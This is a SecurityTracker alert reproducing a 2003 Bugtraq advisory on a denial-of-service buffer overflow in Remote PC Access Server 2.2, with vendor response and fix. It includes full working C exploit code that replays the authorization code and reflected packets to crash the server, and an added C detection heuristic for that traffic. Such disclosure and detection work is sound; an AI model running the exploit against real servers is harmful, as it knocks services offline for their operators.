SecurityTracker.com
Category: Application (Generic) > Remote PC Access
Vendors: access-remote-pc.com
'Remote PC Access' Server Can Be Crashed By Remote Users
SecurityTracker Alert ID: 1006872
CVE Reference: CAN-2003-0415
Updated: Jan 20 2004
Original Entry Date: May 29 2003
Impact: Denial of service via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 2.2
Description:  A denial of service vulnerability was reported in Remote PC Access. A remote user can cause the server component to crash.

Yaron Tal of YTECH reported that a remote user can send a spoofed client authorization code to the target server and then send the packets received from the remote server back to the remote server. This will reportedly cause the target server to crash.

The report indicates that the cause is a buffer overflow.

Some demonstration exploit code is available in the Source Message and at:

http://www.ytech.co.il/advisories/rpca/rpcasrc.c

A binary version of the exploit is available at:

http://www.ytech.co.il/advisories/rpca/RPCACheck22.exe

The original YTECH advisory is available at:

http://www.ytech.co.il/advisories/rpca/rpcaccess.htm

Impact:  A remote user can cause the target server to crash.
Solution:  The vendor has released a fixed version (3.1), available at:

http://www.access-remote-pc.com/download.shtm
http://www.access-remote-pc.com/download/rpcsetup.exe

Vendor URL: www.access-remote-pc.com/
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  postmaster@ytech.co.il
Message History:   None.
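
A detection heuristic for the behaviour described above, as an added example that is not part of the SecurityTracker entry or the YTECH advisory: it flags a reassembled session to port 34012 that opens with the 12-byte authorization code and then has the client repeating server payloads byte for byte. The `seg` record type, the echo threshold of 3 and the sample session are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <string.h>

/* One payload from a reassembled TCP session (hypothetical record type). */
struct seg {
    int from_client;              /* 1 = client to server, 0 = server to client */
    const unsigned char *data;
    size_t len;
};

/* 12-byte client authorization code quoted in the advisory. */
static const unsigned char AUTH_CODE[12] = { 0x27, 0, 0, 0, 0x04, 0, 0, 0, 0, 0, 0, 0 };
#define RPCA_PORT      34012u     /* port the advisory's check program connects to */
#define ECHO_THRESHOLD 3u         /* assumed tuning value, not from the advisory */

/* Count client payloads that repeat, byte for byte, the last server payload. */
static size_t count_reflected(const struct seg *s, size_t n)
{
    const struct seg *last_server = NULL;
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (!s[i].from_client)
            last_server = &s[i];
        else if (last_server && s[i].len > 0 && s[i].len == last_server->len &&
                 memcmp(s[i].data, last_server->data, s[i].len) == 0)
            hits++;
    }
    return hits;
}

/* 1 if the session opens with the code and the client then reflects server data. */
int rpca_reflection_suspected(unsigned dst_port, const struct seg *s, size_t n)
{
    if (dst_port != RPCA_PORT || n == 0 || !s[0].from_client)
        return 0;
    if (s[0].len < sizeof(AUTH_CODE) || memcmp(s[0].data, AUTH_CODE, sizeof(AUTH_CODE)) != 0)
        return 0;
    return count_reflected(s + 1, n - 1) >= ECHO_THRESHOLD;
}

/* Constructed sample session, not captured traffic; the server bytes are made up. */
static const unsigned char ACK[4] = { 0xAA, 0xBB, 0xCC, 0xDD };
static const struct seg SAMPLE[] = {
    { 1, AUTH_CODE, 12 }, { 0, ACK, 4 }, { 1, ACK, 4 },
    { 0, ACK, 4 }, { 1, ACK, 4 }, { 0, ACK, 4 }, { 1, ACK, 4 },
};

int main(void) { return rpca_reflection_suspected(RPCA_PORT, SAMPLE, 7) ? 0 : 1; }
```

The authorization code alone is not an indicator, since a legitimate client sends it too; the signal is the repeated reflection that follows it.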


 Source Message Contents

Date:  Wed, 28 May 2003 14:31:48 +0300 (IDT)
From:  postmaster@ytech.co.il
Subject:  Remote PC Access Server 2.2 Vulnerability

 

Dear Bugtraq

Here are the full details of the vulnerability in Remote PC
Access Server 2.2, taken from our advisory (includes the exploit code):

http://www.ytech.co.il/advisories/rpca/rpcaccess.htm

Best Regards, Yaron Tal
YTECH.CO.IL

-----------------------------------------------------
Remote PC Access Server  2.2 DoS Attack Vulnerability
-----------------------------------------------------

Release Date : 26\05\03
Application : Remote PC Access Server 2.2
Platforms : Windows 95/98/ME/NT/2000/XP
Vendor : Remote Access Software
Author : Yaron Tal (yarontal@ytech.co.il)

---------
Overview:
---------

Remote PC Access is fast, compact software for accessing and controlling
any computer from any computer on the Internet or on local area networks
(LAN). View the remote PC's screen and control its keyboard and mouse just
as if you were sitting in front of it. The software transparently works
through firewalls and routers, and has support for dynamic IP addresses.
There is also an option to connect to a remote computer by its nickname
instead of its IP address. (from download.com)

----------------------
Vulnerability Details:
----------------------

How can the vulnerability be exploited?

Remote PC Access Server uses an authorization code in order to verify
whether a Remote PC Access Client has connected to the local server. The
authorization code is 12 bytes long, filled with the following byte sequence:

Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

The attacker can build a spoofed client program and use a DoS attack in
order to crash the remote server or remote system. If a local client sends
the authorization code to the remote server, the remote server sends an
acknowledgment code back to the local client. After this process, by
sending the packets received from the remote server, the local client
overflows the remote server.

Solution

I notified Remote Access Software about this vulnerability on 21\04\2003
and worked with them to fix the vulnerability. They have now released a new
version, Remote PC Access Server 3.1, with a fix for this vulnerability.
[Download Here]

Vendor Responded

"Your report suggests that the server part of our software can be crashed
by abusing the communication protocol employed between client and server
(namely DoS attack). We are aware of this problem and it affects only a
few places inside the source code. We are releasing a new version in a
week or two which doesn't have this security vulnerability." (Sergey
Stoma)

-------------------------------------------------
Remote PC Access Server 2.2 - Vulnerability Check
-------------------------------------------------

/***************************************************************************
----------------------------------------------------------------------------
 Remote PC Server Version 2.2 - Vulnerability Check (Source Version)
 Copyright (c) 2003 Yaron Tal. All Rights Reserved.
----------------------------------------------------------------------------
** Overview ****************************************************************

   Remote PC Access Server using authorization code, in order to verify
   if Remote PC Access Client has been connected to the local server.
   The authorization code is 12 bytes long filled with the next bytes order:

   Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

   The attacker can build a spoofed client program and use DoS attack,
   in order to crash the remote server or remote system. If a local client
   sends authorization code to remote server, the remote server sends
   acknowledgment code back to the local client, after this process,
   by sending received packets from the remote server, the local client
   overflows the remote server.

** Terms OF Services *******************************************************

You may not use, copy, modify, decompile, disassemble, emulate, clone
rent, lease, sell otherwise reverse engineer, or transfer this program
or any subset of this program, any such unauthorized use shall result
immediate and automatic termination of this license and may result in
criminal and/or civil prosecution.

Yaron Tal is not responsible for any special, incidental, indirect
or consequential damages that may happen when you use this program.
This program can crash remote server or system.

***************************************************************************
    - Website: www.ytech.co.il \ Email: yarontal@ytech.co.il
    - Copyright (C) 2003 Yaron Tal. All Rights Reserved.
***************************************************************************/

#include <stdio.h>
#include <conio.h>
#include <string.h>
#include <winsock.h>

#define WVERSION MAKEWORD(2,2)

void main(int argc, char *argv[])
{
    SOCKET wSocket;
    WSADATA wsaData;
    SOCKADDR_IN wAddress;
    char Ch = 0, Msg[256];

    unsigned char Packet[] = "\x27\x00\x00\x00" //
                             "\x04\x00\x00\x00" // Authorization Code
                             "\x00\x00\x00";    //

    printf("\nRemote PC Server Version 2.2 - Vulnerability Check (Source Version)\n");
    printf("Copyright (C) 2003 Yaron Tal. All Rights Reserved.\n\n");
    printf("Usage: <%s> <Remote IP Address>\n",argv[0]);

    if (argc < 2) exit(1);

    if (WSAStartup(WVERSION, &wsaData))
    {
        printf("- Error: WSAStartup.\n (%d)", GetLastError());
        exit(1);
    }

    memset(&wAddress, 0, sizeof(wAddress));
    wSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    wAddress.sin_family = AF_INET;
    wAddress.sin_addr.s_addr = inet_addr(argv[1]);
    wAddress.sin_port = htons(34012);

    if (wSocket == INVALID_SOCKET)
    {
        printf("Error: socket() (%d)\n", GetLastError());
        exit(1);
    }

    if (connect(wSocket,(LPSOCKADDR)&wAddress,sizeof(struct sockaddr)) == SOCKET_ERROR)
    {
        printf("Error: listen() (%d)\n", GetLastError());
        exit(1);
    }

    printf("Connected To Remote Host...\n");
    printf("Sending Data...\n\n");

    if (send(wSocket, Packet, sizeof(Packet),0) == SOCKET_ERROR)
    {
        printf("- Error: send() (%d)\n", GetLastError());
        exit(1);
    }

    printf("Press ESC to disconnect and exit program.");

    while (Ch !=27)
    {

        if (kbhit()) Ch = getch();

        memset(Msg, 0, sizeof(Msg));
        if (recv(wSocket, Msg, strlen(Msg),0) == SOCKET_ERROR)
        {
            printf("Error: recv() (%d)\n", GetLastError());
            exit(1);
        }

        if (send(wSocket, Msg, sizeof(Msg),0) == SOCKET_ERROR)
        {
            printf("- Error: send() (%d)\n", GetLastError());
            exit(1);
        }

    }

    closesocket(wSocket);
    WSACleanup();
}

------------------------------
Terms OF Services & Copyrights
------------------------------

Disclaimer:

All the information that is available in this advisory is Copyright © 2003
Yaron Tal. Yaron Tal is not responsible for any special, incidental,
indirect or consequential damages that may happen when you use any of the
information in this advisory.

About YTECH.CO.IL: In these days, when information security stands as the
first priority of many computer users, you can't allow your privacy to be
vulnerable. We are a creative and dynamic company which provides security
software for home\business use, security information consulting,
advisories and web site building services.

For more information about ytech.co.il you may visit http://www.ytech.co.il
or contact us via email: contactus@ytech.co.il.

Copyright © 2003 Yaron Tal. All Rights Reserved Worldwide.


[Editor's note:  This advisory is posted on our site with permission from the author.]


 



Copyright 2004, SecurityGlobal.net LLC